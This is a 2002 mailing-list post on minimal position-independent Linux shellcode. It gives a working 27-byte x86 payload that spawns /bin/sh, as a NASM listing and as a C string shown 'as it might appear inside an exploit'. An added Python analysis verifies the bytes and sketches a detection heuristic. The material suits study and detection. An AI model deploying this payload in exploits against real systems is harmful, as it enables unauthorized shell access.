From: Brian Raiter <breadbox@muppetlabs.com>
To: linux-assembly@vger.kernel.org
Subject: Re: shellcode
Date: Wed, 26 Jun 2002 11:00:04 -0700 (PDT)
Message-ID: <15642.292.719679.393500@shub.muppetlabs.com>
In-Reply-To: <20020626190858.41e57817.stephan.walter@gmx.ch>
This thread has been about invoking a shell under BSD, which one would
imagine would be a bit off topic for the linux-assembly mailing list.
So, in order to remedy this ...
A few years ago a friend challenged me to come up with the smallest
possible code to invoke a shell under Linux. The only constraint he
placed was that the code had to be position-independent. Rummaging
through some old notes, I dug out the results of my efforts, which was
the following code (NASM syntax):
00000000 6A0B push byte 11
00000002 E809000000 call $ + 14
00000007 002F62696E2F736800 db 0, '/bin/sh', 0
00000010 5B pop ebx
00000011 58 pop eax
00000012 99 cdq
00000013 43 inc ebx
00000014 8D4BF8 lea ecx, [byte ebx - 8]
00000017 8919 mov [ecx], ebx
00000019 CD80 int 0x80
Or, as it might appear inside an exploit:
char sh[] = "j\v\350\t\0\0\0\0/bin/sh\0[X\231C\215K\370\211\031\315\200";
(*(void(*)(void))sh)();
Note that the program needs to be in writeable memory; thus it needs
to be invoked from a variable and not a direct string literal.
(Unfortunately, it looks like my program is 27 bytes in size, leaving
it slightly longer than the BSD version.)
b
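The listing and the C string above are the same 27 bytes written two ways. The following Python is an added example, not part of Brian's message or the thread: it parses the NASM listing lines back into raw bytes (checking each line's address against the running offset), confirms they match the C literal and the 27-byte count, resolves the `call $ + 14` target, follows the pointer arithmetic that makes the code need writable memory, and runs a crude triage heuristic (a NUL-terminated "/bin/sh" within a short window of `int 0x80`) over constructed sample buffers. The listing text, the sample buffers and the detector's 64-byte window are my own choices, not anything from the message.

```python
import re

# The listing lines from the message, copied here as the parser's input.
LISTING = """\
00000000 6A0B push byte 11
00000002 E809000000 call $ + 14
00000007 002F62696E2F736800 db 0, '/bin/sh', 0
00000010 5B pop ebx
00000011 58 pop eax
00000012 99 cdq
00000013 43 inc ebx
00000014 8D4BF8 lea ecx, [byte ebx - 8]
00000017 8919 mov [ecx], ebx
00000019 CD80 int 0x80
"""

# The message's C string literal; Python bytes literals accept the same
# \v, \t, \0 and octal escapes that C does, so it can be copied verbatim.
C_LITERAL = b"j\v\350\t\0\0\0\0/bin/sh\0[X\231C\215K\370\211\031\315\200"

# One NASM -l style line: 8 hex digits of address, the encoded bytes, the source.
LISTING_RE = re.compile(r"^([0-9A-Fa-f]{8})\s+([0-9A-Fa-f]+)\s+(.*)$")


def parse_listing(text):
    """Return the concatenated machine-code bytes of a NASM listing.

    Each line's address is checked against the byte count so far, so a dropped
    or duplicated line is reported instead of silently shifting every offset.
    """
    out = bytearray()
    for line in text.splitlines():
        m = LISTING_RE.match(line)
        if not m:
            raise ValueError("unrecognised listing line: %r" % line)
        addr = int(m.group(1), 16)
        if addr != len(out):
            raise ValueError("address %#x does not match offset %#x" % (addr, len(out)))
        out += bytes.fromhex(m.group(2))
    return bytes(out)


def call_target(code, at):
    """Resolve an E8 rel32 call at offset `at`: target = next instruction + rel32."""
    if code[at] != 0xE8:
        raise ValueError("no E8 call opcode at offset %#x" % at)
    rel = int.from_bytes(code[at + 1:at + 5], "little", signed=True)
    return at + 5 + rel


def self_write_offsets(code, call_at=2):
    """Follow the register arithmetic in the listing.

    The call pushes the offset of the byte after it (the leading NUL), `pop ebx`
    loads it, `inc ebx` steps onto "/bin/sh", and `lea ecx, [ebx - 8]` lands back
    at offset 0, where `mov [ecx], ebx` stores the argv[0] pointer over the
    already-executed first bytes. That store into the code itself is why the
    message says it must sit in writable memory.
    Returns (offset of "/bin/sh", offset overwritten by the store).
    """
    ret = call_at + 5          # value pushed by the call
    ebx = ret + 1              # after inc ebx
    ecx = ebx - 8              # after lea ecx, [ebx - 8]
    if code[ebx:ebx + 8] != b"/bin/sh\x00":
        raise ValueError("expected NUL-terminated /bin/sh at offset %#x" % ebx)
    return ebx, ecx


def scan_for_shell_pattern(buf, window=64):
    """Triage heuristic: offsets of a NUL-terminated "/bin/sh" that has an
    int 0x80 (CD 80) within `window` bytes on either side. Cheap to run over
    captured payloads, but it is a hint for a human, not a complete signature.
    """
    hits = []
    for m in re.finditer(rb"/bin/sh\x00", buf):
        lo, hi = max(0, m.start() - window), m.end() + window
        if b"\xcd\x80" in buf[lo:hi]:
            hits.append(m.start())
    return hits


if __name__ == "__main__":
    code = parse_listing(LISTING)
    print("bytes:", len(code), "matches C literal:", code == C_LITERAL)
    print("call target: %#x" % call_target(code, 2))
    print("string offset, store offset:", self_write_offsets(code))
    # Constructed sample buffers: one with the bytes embedded, one benign.
    print(scan_for_shell_pattern(b"A" * 100 + code + b"B" * 50))
    print(scan_for_shell_pattern(b"exec /bin/sh\x00 from a script"))
```

The address check in `parse_listing` is the part worth keeping when reusing this on other listings: a byte count that disagrees with the next line's address is the usual sign that a line was lost in copying, and it is exactly the kind of off-by-one that would otherwise go unnoticed until the "27 bytes" claim is checked by hand.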
2002-06-24 5:18 shellcode xlp
2002-06-24 6:01 ` shellcode Scott Lanning
2002-06-25 19:22 ` shellcode Stephan Walter
[not found] ` <20020625144651.A430@nietzsche>
2002-06-25 20:28 ` shellcode Stephan Walter
[not found] ` <20020625161401.B27404@nietzsche>
2002-06-26 17:08 ` shellcode Stephan Walter
2002-06-26 18:00 ` Brian Raiter [this message]